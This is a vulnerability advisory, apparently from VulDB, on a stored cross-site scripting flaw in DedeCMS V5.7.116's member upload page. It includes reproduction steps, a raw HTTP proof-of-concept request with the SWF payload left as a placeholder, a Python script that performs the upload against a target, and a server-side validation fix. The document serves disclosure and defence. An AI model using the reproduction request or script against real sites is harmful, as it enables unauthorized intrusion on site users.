Submission #452983: DedeCMS V5.7.116 Cross Site Scripting

Title: DedeCMS V5.7.116 Cross Site Scripting
Description:
Summary: DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability. A logged-in member can upload an SWF file carrying an XSS payload through /member/uploads_add.php; the file is stored under the web root and served back from /uploads/userup/, so opening its URL executes the payload in the context of the site. The root cause is insufficient validation and sanitization of user-supplied data: as the steps below show, the accepted file type is selected by the client-controlled mediatype form field, and the uploaded content itself is not checked. (SWF content only runs in a browser that still has a Flash plugin, which current browsers no longer ship; the weakness itself, storing attacker-controlled active content under the web root, does not depend on that.)

Details:
1. Log in as a member and open http://target-ip/member/uploads_add.php; upload the .SWF file containing the XSS payload.
2. Intercept the upload request and change the mediatype parameter to 2 (the Flash/SWF media type).
3. The response includes a URL of the form /uploads/userup/1/XXXX.swf.
4. Open that URL to trigger the XSS.

POC:
POST /member/uploads_add.php HTTP/1.1
Host: target-ip
Content-Length: 963
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [user's cookie]
Connection: keep-alive

------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="f"

------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="mediatype"

2
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="keyword"

------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="dopost"

save
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="title"

123
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf"
Content-Type: application/x-shockwave-flash

[xss payload in swf]
------WebKitFormBoundaryfRghPB9M7esxjc3h--
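As an added example (not code from the original submission or from the DedeCMS project), the following Python script builds the multipart request in the shape the PoC describes, with mediatype forced to 2, extracts the stored-file URL from the response, and shows the server-side check that would have rejected the SWF regardless of the client-chosen mediatype. The function names, the assumed allow-list policy in upload_is_acceptable and the constructed SWF header are this example's own assumptions; the sample SWF contains no script at all.

```python
"""Added example, not code from the original submission or from DedeCMS.

It reproduces the request shape of the PoC (multipart upload to
/member/uploads_add.php with mediatype forced to 2), extracts the stored
file URL from the response, and shows the server-side check that would have
rejected the SWF regardless of the client-chosen mediatype. The function
names, the allow-list policy and the sample SWF header are assumptions.
"""
import re
import urllib.request
from typing import Dict, Optional, Tuple

BOUNDARY = "----WebKitFormBoundaryfRghPB9M7esxjc3h"   # boundary used in the PoC
UPLOAD_PATH = "/member/uploads_add.php"
UPLOAD_URL_RE = re.compile(r"/uploads/userup/\d+/[\w.-]+\.swf")

# Constructed sample: a bare SWF header (uncompressed "FWS", version 10,
# declared length 20) followed by zero bytes. It carries no ActionScript;
# it only needs to look like an SWF to the checks below.
SAMPLE_SWF = b"FWS\x0a" + (20).to_bytes(4, "little") + b"\x00" * 12


def build_upload_request(swf_bytes: bytes, title: str = "123",
                         filename: str = "xsstest.swf",
                         boundary: str = BOUNDARY) -> Tuple[bytes, Dict[str, str]]:
    """Return (body, headers) for the POST described in the PoC.

    Field names, order and values follow the PoC; mediatype is set to 2
    (the Flash/SWF media type) so that the .swf extension is accepted.
    """
    fields = [("f", ""), ("mediatype", "2"), ("keyword", ""),
              ("dopost", "save"), ("title", title)]
    body = b""
    for name, value in fields:
        body += (f"--{boundary}\r\n"
                 f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
                 f"{value}\r\n").encode()
    body += (f"--{boundary}\r\n"
             f'Content-Disposition: form-data; name="addonfile"; filename="{filename}"\r\n'
             "Content-Type: application/x-shockwave-flash\r\n\r\n").encode()
    body += swf_bytes + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}",
               "Content-Length": str(len(body))}
    return body, headers


def extract_upload_url(response_text: str) -> Optional[str]:
    """Pull the /uploads/userup/<uid>/<name>.swf path out of the response."""
    m = UPLOAD_URL_RE.search(response_text)
    return m.group(0) if m else None


def send_upload(base_url: str, cookie: str, swf_bytes: bytes,
                timeout: int = 10) -> Optional[str]:
    """POST the upload with the member's session cookie; return the stored URL."""
    body, headers = build_upload_request(swf_bytes)
    headers["Cookie"] = cookie
    req = urllib.request.Request(base_url.rstrip("/") + UPLOAD_PATH,
                                 data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_upload_url(resp.read().decode("utf-8", "replace"))


# --- the check the upload handler should have made -------------------------

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")        # uncompressed, zlib and LZMA SWF
ACTIVE_CONTENT_EXTS = {"swf", "html", "htm", "xhtml", "svg", "php"}


def is_swf(data: bytes) -> bool:
    """Identify an SWF by its magic bytes, whatever the file is named."""
    return data[:3] in SWF_MAGICS


def upload_is_acceptable(filename: str, data: bytes, mediatype: int) -> bool:
    """Hardened decision (assumed policy): the client-chosen mediatype must not
    widen the allow-list, the extension must not be browser-executable, and the
    content is sniffed so a renamed SWF is still rejected."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ACTIVE_CONTENT_EXTS or is_swf(data):
        return False
    allowed = {1: {"jpg", "jpeg", "png", "gif"}}   # image uploads only (assumed)
    return ext in allowed.get(mediatype, set())


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://target-ip 'PHPSESSID=...'")
    print(send_upload(sys.argv[1], sys.argv[2], SAMPLE_SWF))
```

Run it as `python3 repro.py http://target-ip 'PHPSESSID=...'` against a test instance you are authorised to touch; it prints the stored path (or None). The point of upload_is_acceptable is that the fix is not "block mediatype=2" but to decide server-side from extension and content, since the mediatype field is attacker-controlled.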
Source: https://github.com/Hebing123/cve/issues/77
User: jiashenghe (UID 39445)
Submitted: 27.11.2024 09:16
Moderated: 04.12.2024 17:31 (7 days later)
Status: accepted
VulDB entry: 286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype cross site scripting]
Points: 20
